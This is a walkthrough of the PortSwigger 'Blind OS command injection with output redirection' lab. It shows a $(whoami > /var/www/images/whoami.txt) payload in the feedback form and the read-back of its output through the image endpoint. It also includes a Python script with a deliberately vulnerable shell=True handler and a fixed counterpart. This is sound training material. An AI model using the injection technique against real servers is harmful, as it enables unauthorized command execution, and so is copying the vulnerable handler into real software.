In this post, we’re going to solve the PortSwigger lab: “Blind OS command injection with output redirection”.

To solve the lab, we need to execute the whoami command on the server and read its output. The application doesn't return the output of the injected command in its response, so we'll combine the Blind OS Command Injection in the feedback function with output redirection to a file we can read afterwards.


As we can see, there are several fields to fill out. So let’s fill them in:

Now, before submitting the feedback, we prepare Burp Suite to receive the requests:


With this ready, we submit the feedback to capture the request:


This is the request that's sent to the server when submitting feedback. To work with it, we send it to Repeater by pressing Ctrl+R:

Once in Repeater, we can see that a valid request simply gets a 200 status response and not much else: whatever the server does with these parameters, it doesn't echo anything back.
So, among all the parameters being sent, we're going to test whether any of them lets us execute a command, and, since the output isn't returned in the response, redirect that output to a file in a directory we can reach through the website. That way we can read the output of the command we've executed.
The first thing is to find a directory that is both writable by the command and served by the web application. Here we use the directory where the product images are stored, which the lab description tells us is writable:
/var/www/images
Knowing this, we're going to attempt a Blind OS Command Injection that redirects the command output to a file in that directory. The $( ) substitution expands to an empty string, so the server's original command still runs and the response looks exactly like a normal one. Because the payload travels in a URL-encoded form body, the $, (, ), > and space characters must be URL-encoded before sending (in Repeater, select the payload and press Ctrl+U); decoded, the payload is:

$(whoami > /var/www/images/whoami.txt)
Since this is a Blind OS Command Injection, the server's response looks the same whether the command ran or not. To confirm it worked, we need to access the file we redirected the command output to.
To access that file, since we've written it into the folder called "images", we can assume it is served the same way as, for example, the product images on the website:


Images are requested through the filename parameter of the image endpoint, so we replace the value of that parameter with the name of the file we redirected the command output to, in this case whoami.txt:

In this way, we manage to solve the lab:

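The whole procedure above (build the payload, URL-encode it into the feedback request, then read the file back through the image endpoint) as an added example, not code from the original post or from PortSwigger. It assumes the feedback form has the fields csrf, name, email, subject and message and that images are served from an /image endpoint with a filename parameter; the "server" functions are a hypothetical stand-in for the lab's back end so the payload mechanics can be exercised offline, with the vulnerable version next to a fixed one that never hands user input to a shell.

```python
import os
import subprocess
import tempfile
import urllib.parse
from typing import Callable, Optional

# Writable, web-served directory named in the lab description.
IMAGES_DIR = "/var/www/images"


def build_payload(command: str, outfile: str, directory: str = IMAGES_DIR) -> str:
    """Wrap COMMAND in a command substitution whose stdout is redirected to
    DIRECTORY/OUTFILE. The substitution itself expands to an empty string,
    so the server's own command still runs and the response looks normal."""
    return f"$({command} > {directory}/{outfile})"


def build_feedback_body(csrf: str, email_payload: str) -> bytes:
    """URL-encode the feedback form with the payload in the email field.
    Field names are an assumption about the lab's form. '$', '(', ')', '>',
    '/' and the space must be encoded or the payload is mangled in transit
    (Burp Repeater: select the payload and press Ctrl+U)."""
    fields = {
        "csrf": csrf,
        "name": "test",
        "email": email_payload,
        "subject": "test",
        "message": "test",
    }
    return urllib.parse.urlencode(fields).encode()


def image_url(base_url: str, outfile: str) -> str:
    """URL that serves OUTFILE through the image endpoint's filename
    parameter (the /image path is an assumption about the lab)."""
    return f"{base_url}/image?" + urllib.parse.urlencode({"filename": outfile})


def vulnerable_feedback_handler(name: str, email: str, data_dir: str) -> None:
    """Hypothetical stand-in for the lab's bug: user input is interpolated
    into a shell command line and the command's output is discarded, which
    is exactly what makes the injection blind."""
    cmd = f'echo "feedback from {name} <{email}>" >> {data_dir}/feedback.log'
    subprocess.run(cmd, shell=True, check=False,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def fixed_feedback_handler(name: str, email: str, data_dir: str) -> None:
    """Hardened counterpart: no shell, arguments passed as a list, so
    '$(...)' and '>' are plain text and are never interpreted."""
    with open(os.path.join(data_dir, "feedback.log"), "a") as log:
        subprocess.run(["echo", f"feedback from {name} <{email}>"],
                       stdout=log, stderr=subprocess.DEVNULL, check=False)


def exploit_locally(handler: Callable[[str, str, str], None],
                    command: str = "whoami") -> Optional[str]:
    """Drive HANDLER with the injection aimed at a temporary 'images'
    directory, then read the file back the way the lab does through the web
    server. Returns the captured output, or None if nothing was written."""
    with tempfile.TemporaryDirectory() as images:
        payload = build_payload(command, "whoami.txt", directory=images)
        handler("test", payload, images)
        path = os.path.join(images, "whoami.txt")
        if not os.path.exists(path):
            return None
        with open(path) as f:
            return f.read().strip()


if __name__ == "__main__":
    payload = build_payload("whoami", "whoami.txt")
    print("payload:      ", payload)
    print("encoded body: ", build_feedback_body("<csrf-token>", payload).decode())
    print("read it back: ", image_url("https://<lab-id>.web-security-academy.net", "whoami.txt"))
    print("vulnerable handler ->", exploit_locally(vulnerable_feedback_handler))
    print("fixed handler      ->", exploit_locally(fixed_feedback_handler))
```

Against the real lab, the encoded body is what goes into Repeater (with the session cookie and the csrf token from the page) and the image URL is the request that reads the result; locally, the vulnerable handler leaves whoami.txt behind while the fixed one writes the payload verbatim into its log and creates no file, which is the check that the fix actually closed the injection rather than just filtering one character.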